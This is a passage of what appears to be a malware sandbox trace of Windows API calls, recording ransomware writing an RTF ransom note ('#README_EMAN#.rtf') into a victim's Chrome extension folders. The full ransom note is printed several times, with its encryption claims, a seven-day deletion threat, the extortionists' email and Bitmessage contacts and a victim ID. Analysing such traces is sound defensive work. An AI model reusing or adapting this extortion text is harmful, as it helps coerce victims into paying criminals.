nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2462808, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.225] WriteFile (in: hFile=0x2d4, lpBuffer=0x2462808*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2462808*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.226] CloseHandle (hObject=0x2d4) returned 1 [0289.226] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\#readme_eman#.rtf")) returned 0xffffffff [0289.226] GetLastError () returned 0x2 [0289.226] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.228] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.228] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 